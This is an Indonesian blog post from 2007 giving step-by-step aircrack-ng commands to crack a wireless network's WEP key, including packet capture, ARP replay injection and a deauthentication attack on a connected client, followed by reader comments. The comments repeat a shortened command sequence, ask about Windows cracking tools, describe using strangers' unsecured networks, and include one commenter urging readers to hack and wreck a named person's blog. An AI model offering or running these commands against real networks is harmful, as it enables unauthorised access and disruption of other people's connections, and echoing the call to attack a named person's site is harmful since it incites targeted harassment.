Terima kasih telah berkunjung, Blog ini tercipta atas kerjasama kami dengan http://netkom-wifi.com
selaku distributor perangkat wireless terkemuka di tanah air.
Semoga dengan adanya tulisan-tulisan di blog ini bisa membantu anda dalam memahami dunia wireless.


Regards,


Cak Mad


NB :
Pingin sih buat Blog khusus tentang Korupsi, mengingat negara kita gak bisa Maju, faktor utamanya adalah Korupsi, karena Korupsi membuat hanya Pejabat saja yang Makmur, rakyat tetap terkubur, Korupsi membuat mental pelayanan publik menjadi memble, karena Birokrat kita hanya main gaple (sambil nunggu ceperan).












Saturday, September 8, 2007

Hacking Wireless II: Menembus Pertahanan WEP Keys


Menembus Pertahanan WEP Keys:

  1. Jalankan BackTrack.

  1. Reset driver wireless. Ketikkan:

#airmon-ng -> cek interface ath yang aktif

#airmon-ng stop ath0

#airmon-ng stop ath1 -> bila ath1 aktif

#airmon-ng start wifi0

  1. Buka 3 buah console.

  1. Console 1, ketikkan:

#airodump-ng ath0 -> scanning hotspot yang aktif.

#airodump-ng --channel 11 --bssid 00:0E:2E:C2:2C:0E -w target ath0

Keterangan:

Proses ini untuk mengcapture informasi dapat membantu dalam menembus WE

P Key.

--bssid -> MAC-Address dari AP yang akan di crack

-w target -> hasil capture ini akan disimpan di file yang namanya target

  1. Console 2, ketikkan:

Untuk membantu menciptakan pengumpulan paket data

#aireplay-ng --arpreplay -b 00:0E:2E:C2:2C:0E -h 00:0E:2E:C1:1E:83 ath0

Keterangan:

-b -> MAC-Address dari AP.

-h -> MAC-Address dari client yang aktif terhubung ke AP.

  1. Console 3, ketikkan:

Untuk mempercepat pengumpulan paket data, dilakukan serangan deauthentication ke client.

#aireplay-ng --deauth 2 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0

Keterangan:

-c -> MAC-Address dari Client

-a -> MAC-Address dari AP

  1. Setelah terkumpul paket data yang cukup, dilakukan cracking:

#aircrack-ng target*.cap

Maka dapat kita lihat hasil WEP Key yang berhasil didapatkan.


By: Destana Dwi Maulidani & Wilis


19 komentar:

Farry said...

Makasih atas panduan WEP Crack nya

sekedar info, untuk WIFI auditor saya pakai WIFISLAX 3.1, tapi ada sedikit yang mengganggu dari WIFISLAX dari sononya pake bahasa Spain, gawat deh!!!

Ayyub said...

Kalo untuk windows gimana caranya boss?
Mohon pencerahannya,,,
Di email saya : mam29_id@yahoo.com

Makasih banyak.

alley said...

gmn klo pake Winxp2,apakah bisa..?
klo sy pake wifi tp-link TL-WN422G gmn caranya?

alley said...

Gmn klo pake WinXP2..?,apa bisa pake Wifi sebarang Jenis?

Wilis said...

Hacking WEP key dengan tool under Windows kabarnya sih memang ada, namun saya belum pernah coba, jika ada yang tahu silahkan infokan di sini

Wilis said...

Tplink WN322 itu chipsetnya Zydas, itu kurang support utk wireless hacking, sebaiknya anda pakai chipset Ralink, yakni Tplink WN321, atau anda bisa pake Chipset Atheros, beberapa notebook spt Toshiba & Acer bawaan wirelessnya sebagian sdh pake Atheros utk chipsetnya

TOPI HITAM said...

saya adalah salah satu mantan penulis blog di lenteramuda saya tidak mengetahui tentang artikel anda yang telah saya copy ,sebab saya ambil dari jailangkung waktu itu ,lenteramuda adalah suatu komunitas wadah anak muda sebenernya sudah jadi salah satu majalah di jogja tentang sosial dan politik btw karena masalah intern kita bubar

saya hanya ingin minta maaf saja, jika ada masalah mengenai ini silakan tuntut saja PIMPRET LenteraMuda namanya Yuyuk Rahmat Wahyudi dia yang bertanggung jawab atas semuanya sekarang lagi ikut Partai Demokrasi Pembaruan pimpinannya Bpk Mustiko Laut silakan yang punya keahlian hacking silakan di rusak blognya tolong di hajar saja. Kalau bisa nyewa Cracker yang hebat sebab udah keluar sih and benci banget kayaknya lebih tentang masalah pribadi nih
thanks semoga kita bisa kenalan

Wilis said...

Kita sdh pernah kirim email kpd yang bersangkutan scr baik-baik, namun dia balas dengan nada menantang dan arogan.

Arik said...

Kalauu untuk hacking wireless lewat windows bisa gak??? Kalau bisa, bisa gak dikirim ke goes_aric@rocketmail.com

Cak Mad said...

Bisa kok, tapi fiturnya masih lebih komplit pake Linux

!34645 said...

rummit banget mas.......ada yang lebih bagus....tinggal

*airmon-ng stop (device)
*airmon-ng start (device)
*arodump-ng (device)

nahhh abis itu kular deh mac nya client....tinggal pilih salah satu yang paling banyak ngirimin packet data.....

*airodump-ng --channel (channel AP) --bssid (mac AP) -w hasil (device)

trus kalo mw dapet packet lebih cepat lagi pake yang....

*aireplay-ng --arpreplay -b (mac AP) -h (mac client) (device)

tuhh kalo saya cuman gitu tuh.....

kalo yg masalah deauth nggk usah jga nggk papa....yang peting udah nge replay.....

nahhh yang kita tunggu 2 tuh wep nya.....

langsung ajah ....tulis di terminal....

*aircrack-ng hasil*.cap


NB: selain itu jga masih ada tools yg bagus....kalo di backtrack ituh ada yang nama nya spoon wep.....lebih enak di pake....tinggal make cursor doank...kalo aircrack-ng khan harus ngetik dulu.....

(thanks to ALLAH SWT).....

kalo mw liat blog saya silahkan aja....

(http://tutorial-windows-linux.blogspot.com/)

(http://esemkha.blogspot.com/)

smokey said...

Boss Cak Mad, saya pake wajanbolic coba cari wireless netwrk dapet sampe 6 unsecure dah connect ke salah 1 server tapi kenapa masih gak bisa O.L ya? padahal sinyal bagus, apa setting i-net (proxy & IP) nya yg belum dapet? >>saya pake Cain, wire shark & net hopper. thanx

Cak Mad said...

Jelas ini hanyalah masalah setting TCP/IP nya saja

Free WordPress Themes said...

Thyanks

Try Error said...

di coba dulu Om,

makasih bnyk infonya..

Most Wanted said...

Mas sya mo tanya saya punya wireless senao engenius eoc 2610,, chipset atheros ar2316 saya mo crack wep cm knp pas di coba wireless saya Q g k detect ya.. itu knp si mas... ?? mohon pencerahan y mas... trimsss. oia ini ipconfig kompi saya

Most Wanted said...

waduh h.. cak mad tlg aku dunn .. hiks..s.s.3x..

Cak Mad said...

Utk meng-crack WEP tidak bisa menggunakan Senao EOC 2610, harus menggunakan USB Wireless Adapter dgn Chipset tertentu

Most Wanted said...

ohh.. pntesan.. dah saya coba2 g bs2.. ywd makasih banyakkkk.. ya mas atas pncerahnnya..